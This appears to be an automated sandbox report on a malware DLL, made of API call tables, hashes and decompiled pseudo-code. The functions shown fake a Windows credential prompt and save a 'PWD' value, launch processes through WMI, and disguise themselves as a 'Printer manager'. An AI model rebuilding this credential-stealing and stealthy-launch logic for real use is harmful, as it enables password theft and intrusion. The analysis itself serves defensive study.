                                                                                                                        0x6f33997e
                                                                                                                        0x6f339982
                                                                                                                        0x6f339986
                                                                                                                        0x6f33998a
                                                                                                                        0x6f339990
                                                                                                                        0x6f339997
                                                                                                                        0x6f339998
                                                                                                                        0x6f339999
                                                                                                                        0x6f3399a5
                                                                                                                        0x6f3399a6
                                                                                                                        0x6f3399b0
                                                                                                                        0x6f339b49
                                                                                                                        0x6f339b52
                                                                                                                        0x6f339b58
                                                                                                                        0x6f339b5c
                                                                                                                        0x00000000
                                                                                                                        0x6f3399c5
                                                                                                                        0x6f3399d9
                                                                                                                        0x6f3399db
                                                                                                                        0x6f3399e1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3399eb
                                                                                                                        0x6f3399ec
                                                                                                                        0x6f3399ed
                                                                                                                        0x6f3399f9
                                                                                                                        0x6f3399fa
                                                                                                                        0x6f339a04
                                                                                                                        0x6f339b3a
                                                                                                                        0x6f339b43
                                                                                                                        0x00000000
                                                                                                                        0x6f339b43
                                                                                                                        0x6f339a10
                                                                                                                        0x6f339a10
                                                                                                                        0x6f339a10
                                                                                                                        0x6f339a16
                                                                                                                        0x6f339a1f
                                                                                                                        0x6f339a24
                                                                                                                        0x6f339a25
                                                                                                                        0x6f339a26
                                                                                                                        0x6f339a2b
                                                                                                                        0x6f339a2c
                                                                                                                        0x6f339a31
                                                                                                                        0x6f339a32
                                                                                                                        0x6f339a3a
                                                                                                                        0x6f339a3e
                                                                                                                        0x6f339a42
                                                                                                                        0x6f339a46
                                                                                                                        0x6f339a50
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f339a56
                                                                                                                        0x6f339a5b
                                                                                                                        0x6f339a5c
                                                                                                                        0x6f339a64
                                                                                                                        0x6f339a69
                                                                                                                        0x6f339a6e
                                                                                                                        0x6f339a6e
                                                                                                                        0x6f339a74
                                                                                                                        0x6f339a75
                                                                                                                        0x6f339a7d
                                                                                                                        0x6f339a8a
                                                                                                                        0x6f339a8f
                                                                                                                        0x6f339a90
                                                                                                                        0x6f339a91
                                                                                                                        0x6f339a96
                                                                                                                        0x6f339a97
                                                                                                                        0x6f339a98
                                                                                                                        0x6f339a99
                                                                                                                        0x6f339a9a
                                                                                                                        0x6f339aa5
                                                                                                                        0x6f339aa7
                                                                                                                        0x6f339aac
                                                                                                                        0x6f339aac
                                                                                                                        0x6f339ab2
                                                                                                                        0x6f339ab3
                                                                                                                        0x6f339ab8
                                                                                                                        0x6f339abd
                                                                                                                        0x6f339ac4
                                                                                                                        0x6f339ac9
                                                                                                                        0x6f339ace
                                                                                                                        0x6f339ad5
                                                                                                                        0x6f339ada
                                                                                                                        0x6f339adb
                                                                                                                        0x6f339ae5
                                                                                                                        0x6f339ae8
                                                                                                                        0x6f339af0
                                                                                                                        0x6f339af5
                                                                                                                        0x6f339afa
                                                                                                                        0x6f339b12
                                                                                                                        0x6f339b1a
                                                                                                                        0x6f339afc
                                                                                                                        0x6f339afc
                                                                                                                        0x6f339b0a
                                                                                                                        0x6f339b0a
                                                                                                                        0x6f339afa
                                                                                                                        0x6f339b1f
                                                                                                                        0x6f339b1f
                                                                                                                        0x6f339b26
                                                                                                                        0x6f339b2c
                                                                                                                        0x6f339b34
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f339b34
                                                                                                                        0x6f339bab
                                                                                                                        0x6f339bb8
                                                                                                                        0x6f339bbe
                                                                                                                        0x00000000
                                                                                                                        0x6f339bbe
                                                                                                                        0x6f339865
                                                                                                                        0x6f33986d
                                                                                                                        0x6f339872
                                                                                                                        0x6f339873
                                                                                                                        0x6f3398d7
                                                                                                                        0x6f3398d9
                                                                                                                        0x6f3398d9
                                                                                                                        0x6f3398f8
                                                                                                                        0x6f339913
                                                                                                                        0x6f33991f
                                                                                                                        0x6f339925
                                                                                                                        0x6f339947
                                                                                                                        0x6f33994d
                                                                                                                        0x6f33994d
                                                                                                                        0x6f339951
                                                                                                                        0x6f339952
                                                                                                                        0x00000000
                                                                                                                        0x6f339952
                                                                                                                        0x6f33987b
                                                                                                                        0x6f339883
                                                                                                                        0x6f33988d
                                                                                                                        0x6f339898
                                                                                                                        0x6f3398a7
                                                                                                                        0x6f3398a9
                                                                                                                        0x6f3398a9
                                                                                                                        0x6f3398a7
                                                                                                                        0x6f3398c1
                                                                                                                        0x00000000
                                                                                                                        0x6f3398c7
                                                                                                                        0x00000000
                                                                                                                        0x6f3398c7
                                                                                                                        0x6f3398c1
                                                                                                                        0x6f33985f

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F335130: LogonUserW.ADVAPI32(00A56660,00A56660,6F3396ED,00000002,00000000,00A59868), ref: 6F335150
                                                                                                                          • Part of subcall function 6F335130: GetLastError.KERNEL32 ref: 6F33515C
                                                                                                                          • Part of subcall function 6F335130: CloseHandle.KERNEL32(?), ref: 6F335177
                                                                                                                        • SwitchDesktop.USER32(00000000,00000000,00000000), ref: 6F33970C
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F339718
                                                                                                                        • LoadLibraryA.KERNEL32(credui.dll,00000000,00000000), ref: 6F339723
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000004,FF000000), ref: 6F3397BB
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3397C2
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F3397DA
                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 6F339814
                                                                                                                        • PathAddBackslashA.SHLWAPI(?), ref: 6F339822
                                                                                                                        • lstrcatA.KERNEL32(?,rstrui.exe), ref: 6F339844
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000020), ref: 6F339855
                                                                                                                        • LoadStringW.USER32(00000000,000000AB,00000CAE,00000080), ref: 6F33987B
                                                                                                                        • LoadStringW.USER32(00000000,00000091,00000CB2,00000080), ref: 6F33989F
                                                                                                                        • LoadStringW.USER32(00000000,000000D2,00000DB0,00000926), ref: 6F3398B9
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000926,00000000,?,?,00000104,?,00000014,74784F20), ref: 6F339952
                                                                                                                        • wsprintfW.USER32 ref: 6F33998A
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000104,?,00000014,74784F20), ref: 6F3399B6
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F3399CC
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F3399D3
                                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000404), ref: 6F339A64
                                                                                                                        • RtlZeroMemory.NTDLL(00000404,00000202), ref: 6F339A7D
                                                                                                                        • RtlZeroMemory.NTDLL(00000606,00000404), ref: 6F339AB3
                                                                                                                        • RtlZeroMemory.NTDLL(00000A0A,000002A4), ref: 6F339AC4
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(PWD,00000000,00000404,00A58418), ref: 6F339B0A
                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 6F339B26
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B3C
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B43
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B4B
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B52
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,00000004,FF000000), ref: 6F339B61
                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 6F339B77
                                                                                                                        • SwitchDesktop.USER32(00000000), ref: 6F339B84
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F339B91
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F339BBE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeLoadMemoryZero$DesktopLibraryProcessString$AllocErrorLastSleepSwitchThread$BackslashCloseDirectoryHandleLogonPathPrivateProfileSystemTaskUserWritelstrcatwsprintf
                                                                                                                        • String ID: $%s\%s$PWD$credui.dll$rstrui.exe$wuaueng.dll
                                                                                                                        • API String ID: 938628543-1540689510
                                                                                                                        • Opcode ID: 5f5f92134826d2561201cf5ef8132b4256d3da89c9e14607fc0fb722c7e44eb4
                                                                                                                        • Instruction ID: fd8a445435fc3b6a829dbbcb351fdb4702dcea6a5c0bca04883be252e6cc30e8
                                                                                                                        • Opcode Fuzzy Hash: 5f5f92134826d2561201cf5ef8132b4256d3da89c9e14607fc0fb722c7e44eb4
                                                                                                                        • Instruction Fuzzy Hash: 60D191B2A04399EFE720DF65CC88F5BBBEDFB89710F00491DFA8596141DB70A4148B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3329D0, Relevance: 54.6, APIs: 24, Strings: 7, Instructions: 330memorycomstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 32%
                                                                                                                        			E6F3329D0() {
				intOrPtr _v56;
				void* _v76;
				intOrPtr* _v100;
				long _v116;
				char _v120;
				intOrPtr _v132;
				intOrPtr* _v140;
				intOrPtr _v160;
				intOrPtr _v168;
				long _v176;
				char _v180;
				intOrPtr* _v192;
				intOrPtr* _v196;
				intOrPtr _v204;
				char _v208;
				char _v212;
				intOrPtr* _v224;
				intOrPtr _v228;
				intOrPtr* _v236;
				intOrPtr* _v240;
				void* _v248;
				intOrPtr* _v252;
				intOrPtr _v256;
				intOrPtr* _v264;
				intOrPtr* _v272;
				long _v276;
				char _v280;
				short _v284;
				char _v288;
				short _v292;
				intOrPtr* _v300;
				intOrPtr* _v304;
				void* _v308;
				void* _v312;
				char _v316;
				intOrPtr* _v324;
				intOrPtr* _v336;
				long _v352;
				char _v356;
				intOrPtr* _v360;
				intOrPtr _v376;
				intOrPtr* _v380;
				intOrPtr _v384;
				intOrPtr _v392;
				intOrPtr* _v396;
				char* _t83;
				void* _t85;
				intOrPtr* _t86;
				void* _t87;
				intOrPtr* _t88;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr* _t95;
				void* _t98;
				intOrPtr* _t99;
				void* _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t107;
				intOrPtr* _t110;
				intOrPtr* _t113;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t121;
				intOrPtr* _t124;
				short _t127;
				intOrPtr* _t132;
				intOrPtr* _t137;
				void* _t139;
				intOrPtr* _t140;
				intOrPtr _t142;
				intOrPtr* _t145;
				void* _t148;
				intOrPtr* _t151;
				void* _t153;
				intOrPtr* _t154;
				short _t157;
				char _t158;
				void* _t208;
				intOrPtr _t211;
				intOrPtr* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t218;
				intOrPtr* _t219;
				void* _t220;

				_v56 = 0;
				__imp__CoInitializeEx(0, 6);
				_t83 =  &_v76;
				_v76 = 0;
				__imp__CoCreateInstance(0x6f33df9c, 0, 1, 0x6f33decc, _t83);
				if(_t83 < 0) {
					return 0;
				} else {
					_t158 = "voker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x787680
					_t154 = __imp__#2;
					_v116 = 0;
					_t85 =  *_t154(_t158, _t208, _t153);
					_t215 = _t85;
					_t86 = _v100;
					_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))(_t86, _t215, 0, 0, 0, 0, 0, 0,  &_v120);
					__imp__#6(_t215);
					if(_t87 >= 0) {
						_t91 = _v160;
						__imp__CoSetProxyBlanket(_t91, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t91 >= 0) {
							_v176 = 0;
							_t94 =  *_t154(L"Win32_Process");
							_push(0);
							_push( &_v180);
							_push(0);
							_t211 = _t94;
							_t95 = _v196;
							_push(0);
							_push(_t211);
							_push(_t95);
							_v168 = _t211;
							if( *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x18))))() >= 0) {
								_v208 = 0;
								_t98 =  *_t154(L"Win32_ProcessStartup");
								_t216 = _t98;
								_t99 = _v224;
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x18))))(_t99, _t216, 0, 0,  &_v212, 0);
								__imp__#6(_t216);
								if(_t101 >= 0) {
									_t104 = _v240;
									_push( &_v248);
									_v248 = 0;
									_push(0);
									_push(_t104);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x3c))))() >= 0) {
										_t212 = __imp__#8;
										 *_t212( &_v208);
										_t110 = _v264;
										_v212 = 2;
										_v204 = 1;
										 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x14))))(_t110, L"ShowWindow", 0,  &_v212, 0);
										_t113 = _v272;
										_push(0);
										_push( &_v280);
										_push(0);
										_v280 = 0;
										_push(L"Create");
										_push(_t113);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t113 + 0x4c))))() >= 0) {
											_t118 = _v300;
											_push( &_v312);
											_v312 = 0;
											_push(0);
											_push(_t118);
											if( *((intOrPtr*)( *((intOrPtr*)( *_t118 + 0x3c))))() >= 0) {
												_t217 = E6F33A360(_v228, 0, 0);
												if(_t217 != 0) {
													_t127 = lstrlenW(_t217) + 2;
													__imp__#4(_t217, _t127);
													_t157 = _t127;
													HeapFree(GetProcessHeap(), 0, _t217);
													if(_t157 != 0) {
														 *_t212( &_v288);
														_v292 = 8;
														_t132 = _v336;
														_v284 = _t157;
														 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x14))))(_t132, L"CommandLine", 0,  &_v292, 0);
														_t135 = _v256;
														_t213 = 0;
														if(_v256 != 0) {
															_t148 = E6F33A360(_t135, 0, 0);
															_t220 = _t148;
															if(_t220 != 0) {
																__imp__#2(_t220);
																_t213 = _t148;
																if(_t213 != 0) {
																	_t151 = _v360;
																	_v316 = 8;
																	_v308 = _t213;
																	 *((intOrPtr*)( *((intOrPtr*)( *_t151 + 0x14))))(_t151, L"CurrentDirectory", 0,  &_v316, 0);
																}
																HeapFree(GetProcessHeap(), 0, _t220);
															}
														}
														__imp__#8( &_v280);
														_t137 = _v360;
														_v276 = _v352;
														_v284 = 9;
														_t139 =  *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x14))))(_t137, L"ProcessStartupInformation", 0,  &_v284, 0);
														_v352 = 0;
														__imp__#2(L"Create");
														_t218 = _t139;
														_t140 = _v380;
														_t142 =  *((intOrPtr*)( *((intOrPtr*)( *_t140 + 0x60))))(_t140, _v352, _t218, 0, 0, _v384,  &_v356, 0);
														_t219 = __imp__#6;
														_v376 = _t142;
														 *_t219(_t218);
														 *_t219(_t157);
														if(_t213 != 0) {
															 *_t219(_t213);
														}
														if(_v384 >= 0) {
															_t145 = _v396;
															 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 8))))(_t145);
															_v392 = 1;
														}
													}
												}
												_t124 = _v324;
												 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
											}
											_t121 = _v312;
											 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))(_t121);
										}
										_t116 = _v304;
										 *((intOrPtr*)( *((intOrPtr*)( *_t116 + 8))))(_t116);
										_t211 = _v284;
									}
									_t107 = _v252;
									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))(_t107);
								}
								_t102 = _v236;
								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
							}
							__imp__#6(_t211);
						}
						_t92 = _v192;
						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
					}
					_t88 = _v140;
					 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
					return _v132;
				}
			}




























































































                                                                                                                        0x6f3329dc
                                                                                                                        0x6f3329e0
                                                                                                                        0x6f3329e6
                                                                                                                        0x6f3329f8
                                                                                                                        0x6f3329fc
                                                                                                                        0x6f332a04
                                                                                                                        0x6f332d42
                                                                                                                        0x6f332a0a
                                                                                                                        0x6f332a0a
                                                                                                                        0x6f332a11
                                                                                                                        0x6f332a19
                                                                                                                        0x6f332a1d
                                                                                                                        0x6f332a29
                                                                                                                        0x6f332a2b
                                                                                                                        0x6f332a37
                                                                                                                        0x6f332a3c
                                                                                                                        0x6f332a44
                                                                                                                        0x6f332a4a
                                                                                                                        0x6f332a59
                                                                                                                        0x6f332a61
                                                                                                                        0x6f332a6c
                                                                                                                        0x6f332a70
                                                                                                                        0x6f332a72
                                                                                                                        0x6f332a77
                                                                                                                        0x6f332a78
                                                                                                                        0x6f332a79
                                                                                                                        0x6f332a7b
                                                                                                                        0x6f332a81
                                                                                                                        0x6f332a82
                                                                                                                        0x6f332a83
                                                                                                                        0x6f332a87
                                                                                                                        0x6f332a8f
                                                                                                                        0x6f332a9a
                                                                                                                        0x6f332a9e
                                                                                                                        0x6f332aa7
                                                                                                                        0x6f332aa9
                                                                                                                        0x6f332ab5
                                                                                                                        0x6f332aba
                                                                                                                        0x6f332ac2
                                                                                                                        0x6f332ac8
                                                                                                                        0x6f332ad0
                                                                                                                        0x6f332ad1
                                                                                                                        0x6f332ad7
                                                                                                                        0x6f332ad8
                                                                                                                        0x6f332ae0
                                                                                                                        0x6f332ae6
                                                                                                                        0x6f332af1
                                                                                                                        0x6f332af3
                                                                                                                        0x6f332afd
                                                                                                                        0x6f332b08
                                                                                                                        0x6f332b1b
                                                                                                                        0x6f332b1d
                                                                                                                        0x6f332b21
                                                                                                                        0x6f332b26
                                                                                                                        0x6f332b27
                                                                                                                        0x6f332b28
                                                                                                                        0x6f332b2e
                                                                                                                        0x6f332b33
                                                                                                                        0x6f332b3b
                                                                                                                        0x6f332b41
                                                                                                                        0x6f332b49
                                                                                                                        0x6f332b4a
                                                                                                                        0x6f332b50
                                                                                                                        0x6f332b51
                                                                                                                        0x6f332b59
                                                                                                                        0x6f332b6b
                                                                                                                        0x6f332b72
                                                                                                                        0x6f332b7f
                                                                                                                        0x6f332b84
                                                                                                                        0x6f332b8c
                                                                                                                        0x6f332b95
                                                                                                                        0x6f332b9d
                                                                                                                        0x6f332bb5
                                                                                                                        0x6f332bc2
                                                                                                                        0x6f332bc7
                                                                                                                        0x6f332bcc
                                                                                                                        0x6f332bdb
                                                                                                                        0x6f332bdd
                                                                                                                        0x6f332be1
                                                                                                                        0x6f332be5
                                                                                                                        0x6f332bea
                                                                                                                        0x6f332bef
                                                                                                                        0x6f332bf6
                                                                                                                        0x6f332bf9
                                                                                                                        0x6f332bff
                                                                                                                        0x6f332c03
                                                                                                                        0x6f332c05
                                                                                                                        0x6f332c0f
                                                                                                                        0x6f332c1a
                                                                                                                        0x6f332c29
                                                                                                                        0x6f332c29
                                                                                                                        0x6f332c34
                                                                                                                        0x6f332c34
                                                                                                                        0x6f332bf6
                                                                                                                        0x6f332c3f
                                                                                                                        0x6f332c49
                                                                                                                        0x6f332c4e
                                                                                                                        0x6f332c5d
                                                                                                                        0x6f332c6d
                                                                                                                        0x6f332c74
                                                                                                                        0x6f332c78
                                                                                                                        0x6f332c8e
                                                                                                                        0x6f332c90
                                                                                                                        0x6f332c9d
                                                                                                                        0x6f332ca0
                                                                                                                        0x6f332ca6
                                                                                                                        0x6f332caa
                                                                                                                        0x6f332cad
                                                                                                                        0x6f332cb1
                                                                                                                        0x6f332cb4
                                                                                                                        0x6f332cb4
                                                                                                                        0x6f332cba
                                                                                                                        0x6f332cbc
                                                                                                                        0x6f332cc6
                                                                                                                        0x6f332cc8
                                                                                                                        0x6f332cc8
                                                                                                                        0x6f332cba
                                                                                                                        0x6f332b9d
                                                                                                                        0x6f332cd0
                                                                                                                        0x6f332cda
                                                                                                                        0x6f332cda
                                                                                                                        0x6f332cdc
                                                                                                                        0x6f332ce6
                                                                                                                        0x6f332ce6
                                                                                                                        0x6f332ce8
                                                                                                                        0x6f332cf2
                                                                                                                        0x6f332cf4
                                                                                                                        0x6f332cf4
                                                                                                                        0x6f332cf8
                                                                                                                        0x6f332d02
                                                                                                                        0x6f332d02
                                                                                                                        0x6f332d04
                                                                                                                        0x6f332d0e
                                                                                                                        0x6f332d0e
                                                                                                                        0x6f332d11
                                                                                                                        0x6f332d11
                                                                                                                        0x6f332d17
                                                                                                                        0x6f332d21
                                                                                                                        0x6f332d21
                                                                                                                        0x6f332d23
                                                                                                                        0x6f332d2d
                                                                                                                        0x6f332d3a
                                                                                                                        0x6f332d3a

                                                                                                                        APIs
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000006), ref: 6F3329E0
                                                                                                                        • CoCreateInstance.OLE32(6F33DF9C,00000000,00000001,6F33DECC,?), ref: 6F3329FC
                                                                                                                        • SysAllocString.OLEAUT32(00787680), ref: 6F332A1D
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332A3C
                                                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 6F332A59
                                                                                                                        • SysAllocString.OLEAUT32(Win32_Process), ref: 6F332A70
                                                                                                                        • SysAllocString.OLEAUT32(Win32_ProcessStartup), ref: 6F332A9E
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332ABA
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 6F332AF1
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,?,6F3375D5,?,00000001,00000000), ref: 6F33A37F
                                                                                                                          • Part of subcall function 6F33A360: GetProcessHeap.KERNEL32(00000008,00000002), ref: 6F33A392
                                                                                                                          • Part of subcall function 6F33A360: HeapAlloc.KERNEL32(00000000), ref: 6F33A399
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 6F33A3A9
                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 6F332B79
                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,-00000002), ref: 6F332B84
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332B8E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F332B95
                                                                                                                        • PathQuoteSpacesW.SHLWAPI(00000000), ref: 6F332BAA
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 6F332BB5
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 6F332BF9
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332C2D
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F332C34
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 6F332C3F
                                                                                                                        • SysAllocString.OLEAUT32(Create), ref: 6F332C78
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332CAA
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332CAD
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332CB4
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332D11
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Free$Alloc$Heap$InitProcessVariant$ByteCharMultiWide$BlanketCreateInitializeInstancePathProxyQuoteSpaceslstrlen
                                                                                                                        • String ID: CommandLine$Create$CurrentDirectory$ProcessStartupInformation$ShowWindow$Win32_Process$Win32_ProcessStartup
                                                                                                                        • API String ID: 2088563290-1030916257
                                                                                                                        • Opcode ID: d6e58e3f9d54f0283946c6fe008999538b595a1c9c38a6ce64008665d2e9a488
                                                                                                                        • Instruction ID: 9e2a923334f07d0e7d1ddaf3872355eef9182f973ed0f6f95c5417562070ed61
                                                                                                                        • Opcode Fuzzy Hash: d6e58e3f9d54f0283946c6fe008999538b595a1c9c38a6ce64008665d2e9a488
                                                                                                                        • Instruction Fuzzy Hash: 83B10572A04359AFC710DFA9C884D6BBBEEFFC9654F10890DF549C7210DA35E9018BA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3352B0, Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 97memorysleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 71%
                                                                                                                        			E6F3352B0(void* __ebp, intOrPtr _a4) {
				char _v256;
				char _v264;
				long _v268;
				void* __ebx;
				void* __edi;
				intOrPtr _t7;
				void* _t14;
				long _t19;
				void* _t25;
				intOrPtr _t28;
				char _t29;
				void* _t30;
				char _t31;
				void* _t33;
				intOrPtr _t36;
				void* _t37;
				void* _t38;
				long* _t40;
				long* _t41;

				_t40 =  &_v268;
				_t36 = _a4;
				if(M6F34050C != 0 || _t36 != 0) {
					E6F334130();
				}
				_t7 = M6F340544; // 0x1
				if(_t7 != 0 && (M6F340540 != 0 || _t36 != 0)) {
					_t30 = M6F340534; // 0xa563b0
					_push(1);
					_push(L"Printer manager");
					E6F334C30(_t7, _t30, L"UniPrint Manager");
					_t40 =  &(_t40[5]);
				}
				_push(_t25);
				_push(_t33);
				_push(0);
				_push(0);
				E6F3344D0(_t25, _t33);
				_t31 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
				E6F332DF0(_t31, ".pdll");
				_t41 =  &(_t40[4]);
				Sleep(0xfa0);
				_t37 = HeapAlloc(GetProcessHeap(), 8, 0x400);
				if(_t37 != 0) {
					_v268 = GetTickCount();
					_t19 = RtlRandom( &_v268);
